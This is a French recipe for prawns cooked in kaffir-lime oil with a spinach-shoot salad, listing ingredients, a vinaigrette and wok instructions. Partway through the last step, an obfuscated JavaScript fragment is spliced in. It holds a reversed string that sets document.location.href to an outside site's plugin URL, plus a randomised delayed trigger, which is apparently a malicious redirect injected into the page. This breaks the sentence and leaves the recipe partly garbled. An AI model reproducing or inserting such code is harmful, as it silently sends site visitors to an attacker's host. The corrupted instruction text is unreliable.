
GAMBAS À L’HUILE DE COMBAWA & SALADE DE POUSSES D’ÉPINARDS
Pour 4 Pers.
INGRÉDIENTS :
– 16 grosses gambas de Madagascar
– 3 gousses d’ail émincées
– huile de combawa (épiceries fines) – celle de Roellinger est extra
– 2 citrons en tranches épaisses
– 1 sachet de pousses d’épinards
– 2 poivrons rouges en petits cubes
– 1 avocat en petits cubes
graines germées (ici pousses d’alfalfa)
– Sel/poivre
vinaigrette : 2 CS huile d’olive, 2 CS huile de Colza, 1 CS sauce soja, 1CS sirop d’agave, 1 CS vinaigre de cidre, 1 CS vinaigre balsamique
Chauffer l’huile dans un wok avec l’ail (cuire rapidement pour ne pas colorer l’ail) et rajouter les gambas et le citron.
Saler, poivrer et cuire jusqu’à ce que les gambas soient roses.
Ne pas trop cuire pour qu’elles restent moelleuses et juteuses.
Mélanger toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tous les ingrédients de la salade et servir immédiatement.
Bon appétit !
